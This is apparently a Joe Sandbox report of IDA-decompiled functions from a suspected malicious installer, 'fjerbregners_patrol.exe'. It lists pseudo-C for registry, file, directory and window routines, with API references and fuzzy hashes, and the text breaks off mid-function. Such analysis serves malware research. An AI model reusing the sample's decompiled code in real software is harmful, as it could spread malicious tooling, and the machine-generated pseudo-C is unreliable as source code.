                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                                                            • Opcode ID: d48eae285846c62a0b269bd166042e697c51c99d4c3f647f5f497e6ebf3d7d6b
                                                                                                                                                                                            • Instruction ID: 358545081af8101f3d05c078397430f203bd55cef57482445cd9502eb39e55a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: d48eae285846c62a0b269bd166042e697c51c99d4c3f647f5f497e6ebf3d7d6b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1001C071649351EFE3059B64DE88A7B769CEF80306F00083FF442A61C0D6B98D05966E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402716 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                            			E00402716(char __ebx) {
				void* _t16;
				void* _t23;
				void* _t24;
				char* _t28;
				void* _t32;

				_t16 = E00402ED0(_t23, _t24, _t32, 0x20019); // executed
				E00402E92(_t24, 0x33);
				 *_t28 = __ebx;
				if(_t16 != 0) {
					__ecx = __esp + 0x54;
					 *(__esp + 0x54) = 0x400;
					__ecx = __esp + 0x1c;
					__eax = RegQueryValueExA(__esi, __eax, __ebx, __esp + 0x1c, __ebp, __esp + 0x54);
					__ecx = 0;
					__ecx = 1;
					__eflags = __eax;
					if(__eax != 0) {
						L10:
						 *__ebp = __bl;
						 *(__esp + 0x10) = __ecx;
					} else {
						__eflags =  *((intOrPtr*)(__esp + 0x14)) - 4;
						if( *((intOrPtr*)(__esp + 0x14)) == 4) {
							__eax = 0;
							__eflags =  *(__esp + 0x3c);
							__eax = 0 | __eflags == 0x00000000;
							 *(__esp + 0x18) = __eflags == 0;
							__eax = E00406408(__ebp,  *__ebp);
						} else {
							__eflags =  *((intOrPtr*)(__esp + 0x14)) - 1;
							if( *((intOrPtr*)(__esp + 0x14)) == 1) {
								L7:
								__eax =  *(__esp + 0x38);
								 *(__esp + 0x10) =  *(__esp + 0x38);
								__ebp[0x3ff] = __bl;
							} else {
								__eflags =  *((intOrPtr*)(__esp + 0x14)) - 2;
								if( *((intOrPtr*)(__esp + 0x14)) != 2) {
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
					_push(__esi);
					__eax = RegCloseKey(); // executed
					__eax =  *(__esp + 0x10);
				}
				 *0x4240c8 =  *0x4240c8 + 1;
				return 0;
			}








                                                                                                                                                                                            0x0040271b
                                                                                                                                                                                            0x00402724
                                                                                                                                                                                            0x00402729
                                                                                                                                                                                            0x0040272e
                                                                                                                                                                                            0x00402734
                                                                                                                                                                                            0x00402738
                                                                                                                                                                                            0x00402742
                                                                                                                                                                                            0x0040274a
                                                                                                                                                                                            0x00402750
                                                                                                                                                                                            0x00402752
                                                                                                                                                                                            0x00402753
                                                                                                                                                                                            0x00402755
                                                                                                                                                                                            0x00402793
                                                                                                                                                                                            0x00402793
                                                                                                                                                                                            0x00402796
                                                                                                                                                                                            0x00402757
                                                                                                                                                                                            0x00402757
                                                                                                                                                                                            0x0040275c
                                                                                                                                                                                            0x0040277e
                                                                                                                                                                                            0x00402780
                                                                                                                                                                                            0x00402785
                                                                                                                                                                                            0x00402788
                                                                                                                                                                                            0x0040278c
                                                                                                                                                                                            0x0040275e
                                                                                                                                                                                            0x0040275e
                                                                                                                                                                                            0x00402762
                                                                                                                                                                                            0x0040276b
                                                                                                                                                                                            0x0040276b
                                                                                                                                                                                            0x0040276f
                                                                                                                                                                                            0x00402773
                                                                                                                                                                                            0x00402764
                                                                                                                                                                                            0x00402764
                                                                                                                                                                                            0x00402769
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402769
                                                                                                                                                                                            0x00402762
                                                                                                                                                                                            0x0040275c
                                                                                                                                                                                            0x0040279a
                                                                                                                                                                                            0x0040270b
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm8742.tmp,?,?,00000011,00000002), ref: 0040270B
                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040274A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                                            • Opcode ID: 7e905d1bca04df0dfb21a36958809a8f08020a441f0c0813156b644387e2cdd3
                                                                                                                                                                                            • Instruction ID: 5537260e8683acef799da91830627f9803fd93e7b8a80e73ced2f979d0544c64
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e905d1bca04df0dfb21a36958809a8f08020a441f0c0813156b644387e2cdd3
                                                                                                                                                                                            • Instruction Fuzzy Hash: C5118E31549351DFD710DF609A48A6B7794EF50315F00483FF882A62C0D3B89A098AAB
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004025C5 Relevance: 3.1, APIs: 2, Instructions: 57registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004025C5(void* __ebx, void* _a8, void* _a20, signed int _a52, intOrPtr _a56, void* _a80) {
				signed int _t14;
				void* _t17;
				void* _t23;
				signed int _t25;
				void* _t27;
				void* _t29;
				long _t31;
				intOrPtr* _t32;
				void* _t35;

				_t31 = 1;
				_t37 = _a56 - __ebx;
				if(_a56 != __ebx) {
					_t32 = E00402E92(_t27, 0x22);
					_t25 = _a52 >> 1;
					__eflags =  *_t32 - __ebx;
					if( *_t32 != __ebx) {
						 *(_t35 + 0x20) = _t25 | 0x00100020;
						__eflags = E00405FCC(E00402E77( *((intOrPtr*)(_t35 + 0x58))), _t35 + 0x18);
						if(__eflags == 0) {
							_t31 = 6;
						} else {
							_t31 = E0040141E(__eflags, _t12, _t32,  *((intOrPtr*)(_t35 + 0x18)));
						}
					} else {
						_t31 = 0x3eb;
					}
				} else {
					_t17 = E00402ED0(_t23, _t27, _t37, 2); // executed
					_t29 = _t17;
					if(_t29 != 0) {
						_t31 = RegDeleteValueA(_t29, E00402E92(_t27, 0x33));
						RegCloseKey(_t29);
					}
				}
				_t14 = 0 | _t31 != 0x00000000;
				 *0x4240c8 =  *0x4240c8 + _t14;
				return 0;
			}












                                                                                                                                                                                            0x004025c7
                                                                                                                                                                                            0x004025c8
                                                                                                                                                                                            0x004025cc
                                                                                                                                                                                            0x00402600
                                                                                                                                                                                            0x00402602
                                                                                                                                                                                            0x00402604
                                                                                                                                                                                            0x00402606
                                                                                                                                                                                            0x0040261e
                                                                                                                                                                                            0x0040262d
                                                                                                                                                                                            0x0040262f
                                                                                                                                                                                            0x00402642
                                                                                                                                                                                            0x00402631
                                                                                                                                                                                            0x0040263c
                                                                                                                                                                                            0x0040263c
                                                                                                                                                                                            0x00402608
                                                                                                                                                                                            0x00402608
                                                                                                                                                                                            0x00402608
                                                                                                                                                                                            0x004025ce
                                                                                                                                                                                            0x004025d0
                                                                                                                                                                                            0x004025d5
                                                                                                                                                                                            0x004025d9
                                                                                                                                                                                            0x004025eb
                                                                                                                                                                                            0x004025ed
                                                                                                                                                                                            0x004025ed
                                                                                                                                                                                            0x004025d9
                                                                                                                                                                                            0x00402647
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004025E4
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004025ED
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseDeleteValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2831762973-0
                                                                                                                                                                                            • Opcode ID: ac2cb91967e8be58c4a3e037e60c688de4476bc06ddf337989fa1f82c62b037d
                                                                                                                                                                                            • Instruction ID: e7ee77ff1f0822738aa6190502106638059768586daded4881c5d7c6b34c21b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac2cb91967e8be58c4a3e037e60c688de4476bc06ddf337989fa1f82c62b037d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21012632904721B7D3216A709E4EB3BA698AB50360F15083FF9C1B32E1EABDCD51529D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                            			E00401399(signed int _a4) {
				intOrPtr* _t6;
				signed int _t10;
				int _t11;
				int _t12;
				void* _t16;
				signed int _t17;
				void* _t18;
				signed int _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 < 0) {
					L10:
					return 0;
				}
				while(1) {
					_t6 =  *0x424030 + _t20 * 0x1c;
					if( *_t6 == 1) {
						goto L10;
					}
					_push(_t6);
					if(E0040154A() == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t16 = E00402F0C(_t7);
					if(_t16 != 0) {
						_t17 = _t16 - 1;
						_t10 = _t20;
						_t20 = _t17;
						_t18 = _t17 - _t10;
					} else {
						_t18 = _t16 + 1;
						_t20 = _t20 + 1;
					}
					if( *((intOrPtr*)(_t21 + 0x10)) != 0) {
						_t11 =  *0x4237d0; // 0x25
						_t12 = _t11 + _t18;
						 *0x4237d0 = _t12;
						SendMessageA( *(_t21 + 0x1c), 0x402, MulDiv(_t12, 0x7530,  *0x4237cc), 0); // executed
					}
					if(_t20 >= 0) {
						continue;
					} else {
						goto L10;
					}
				}
				goto L10;
			}












                                                                                                                                                                                            0x0040139a
                                                                                                                                                                                            0x004013a1
                                                                                                                                                                                            0x00401413
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401413
                                                                                                                                                                                            0x004013a8
                                                                                                                                                                                            0x004013b0
                                                                                                                                                                                            0x004013b5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004013b7
                                                                                                                                                                                            0x004013bf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040141a
                                                                                                                                                                                            0x004013c7
                                                                                                                                                                                            0x004013cb
                                                                                                                                                                                            0x004013d1
                                                                                                                                                                                            0x004013d2
                                                                                                                                                                                            0x004013d4
                                                                                                                                                                                            0x004013d6
                                                                                                                                                                                            0x004013cd
                                                                                                                                                                                            0x004013cd
                                                                                                                                                                                            0x004013ce
                                                                                                                                                                                            0x004013ce
                                                                                                                                                                                            0x004013dd
                                                                                                                                                                                            0x004013df
                                                                                                                                                                                            0x004013ec
                                                                                                                                                                                            0x004013f4
                                                                                                                                                                                            0x00401409
                                                                                                                                                                                            0x00401409
                                                                                                                                                                                            0x00401411
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401411
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MulDiv.KERNEL32(00000025,00007530,00000000), ref: 004013F9
                                                                                                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                            • Opcode ID: b15c9005a0085edfe4fe14072d6e47f2fde2f933efb7038c3a25cda4589b9c3e
                                                                                                                                                                                            • Instruction ID: 1106b96b8647977506e2e4654d834c66860a55ba0e4ea7e878adcd9f1447bbb3
                                                                                                                                                                                            • Opcode Fuzzy Hash: b15c9005a0085edfe4fe14072d6e47f2fde2f933efb7038c3a25cda4589b9c3e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1101B1B2B102219BDB295E28AC08B2A26A9A784711F55453EF501F72F0D6B89C028758
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00405CEC Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00405CEC(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v34;
				char _v36;
				short _t13;
				int _t17;
				long _t20;

				_t13 = 4;
				_v34 = _t13;
				_t20 = 0;
				_v36 = 1;
				_v32 = 0x408558;
				_v28 = 0x408558;
				_v16.lpSecurityDescriptor =  &_v36;
				_v24 = 0;
				_v20 = 0x408548;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 0;
				_t17 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t17 == 0) {
					_t20 = GetLastError();
				}
				return _t20;
			}













                                                                                                                                                                                            0x00405cf5
                                                                                                                                                                                            0x00405cf6
                                                                                                                                                                                            0x00405cfa
                                                                                                                                                                                            0x00405d01
                                                                                                                                                                                            0x00405d07
                                                                                                                                                                                            0x00405d0a
                                                                                                                                                                                            0x00405d10
                                                                                                                                                                                            0x00405d1a
                                                                                                                                                                                            0x00405d1d
                                                                                                                                                                                            0x00405d24
                                                                                                                                                                                            0x00405d2b
                                                                                                                                                                                            0x00405d2e
                                                                                                                                                                                            0x00405d36
                                                                                                                                                                                            0x00405d3e
                                                                                                                                                                                            0x00405d3e
                                                                                                                                                                                            0x00405d44

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(000000F0,00000000,?), ref: 00405D2E
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405D38
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                                            • Opcode ID: fec9d241177de69c523cf085dde60fe19c32a2b2c0b8003d10e92bfb93bde23b
                                                                                                                                                                                            • Instruction ID: 67194f339f3fa8d78a2a34d17c2fddb9863a7969a05429119de6401948a65a8a
                                                                                                                                                                                            • Opcode Fuzzy Hash: fec9d241177de69c523cf085dde60fe19c32a2b2c0b8003d10e92bfb93bde23b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F0A4B5D00209ABDB009FE99985A9EBBB4FF08304F50813AD655F6240E77896488B99
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402000 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00402019
                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00402024
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                                            • Opcode ID: b8deefcb901ce22233536c53ef636c5faf5ab8d06bca46297876e9ea0e14d9ba
                                                                                                                                                                                            • Instruction ID: 5a4708f03214c733e1a1a18e713d173efab71670155e9624b13f2c1315e27312
                                                                                                                                                                                            • Opcode Fuzzy Hash: b8deefcb901ce22233536c53ef636c5faf5ab8d06bca46297876e9ea0e14d9ba
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CE02632648300CFE350EB20FE4D56A73A4FB40321F10083FFA01A10D0DABA8846966E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004063E4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004063E4(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				intOrPtr _t5;
				char _t7;

				_t3 = _a4;
				_t7 =  *_t3;
				if(_t7 != 0) {
					_t5 = _a8;
					while(_t7 != _t5) {
						_t3 = CharNextA(_t3); // executed
						_t7 =  *_t3;
						if(_t7 != 0) {
							continue;
						}
						break;
					}
					return _t3;
				}
				return _t3;
			}






                                                                                                                                                                                            0x004063e4
                                                                                                                                                                                            0x004063e8
                                                                                                                                                                                            0x004063ec
                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                            0x004063f3
                                                                                                                                                                                            0x004063f8
                                                                                                                                                                                            0x004063fe
                                                                                                                                                                                            0x00406402
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406402
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406404
                                                                                                                                                                                            0x00406405

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\fjerbregners_patrol.exe",004037F0,"C:\Users\user\Desktop\fjerbregners_patrol.exe",00000000,"C:\Users\user\Desktop\fjerbregners_patrol.exe",00000000), ref: 004063F8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • "C:\Users\user\Desktop\fjerbregners_patrol.exe", xrefs: 004063EE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\fjerbregners_patrol.exe"
                                                                                                                                                                                            • API String ID: 3213498283-3012761959
                                                                                                                                                                                            • Opcode ID: 7e928b73eb363b3a4bb930836af3a717c470da70a3f3482058a8cb76f9cf24b9
                                                                                                                                                                                            • Instruction ID: 0adb28a24bd29d5f69e79d7773ab09ad0f0179a5883fd577ad4f5242daa60bf9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e928b73eb363b3a4bb930836af3a717c470da70a3f3482058a8cb76f9cf24b9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D022200092D01BE2408B2002384A37FE86E13325B3DC0AAF8C16B303E3398C24A3AC
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040671A Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E0040671A(CHAR* _a4, long _a8, long _a12) {
				long _t5;
				void* _t7;

				_t5 = GetFileAttributesA(_a4); // executed
				_t6 =  ==  ? 0 : _t5;
				_t7 = CreateFileA(_a4, _a8, "true", 0, _a12,  ==  ? 0 : _t5, 0); // executed
				return _t7;
			}





                                                                                                                                                                                            0x0040671e
                                                                                                                                                                                            0x0040672b
                                                                                                                                                                                            0x0040673e
                                                                                                                                                                                            0x00406744

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000003,004032DC,C:\Users\user\Desktop\fjerbregners_patrol.exe,80000000,00000003), ref: 0040671E
                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 0040673E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                            • Opcode ID: 8ce0f9733e0969eb86cd5998c13d88c3d8b693fdea9fe21ad50f076a84493dba
                                                                                                                                                                                            • Instruction ID: 447731a7c896857249ef7b4860d599cf374368b55334f9df021ae6007089d03e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ce0f9733e0969eb86cd5998c13d88c3d8b693fdea9fe21ad50f076a84493dba
                                                                                                                                                                                            • Instruction Fuzzy Hash: A1D09E71158201EEEF054F20DE4AF1FBA65EF94710F118A2CF1A5940F0DA718815AA11
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE82BC4 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                            			E6EE82BC4(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

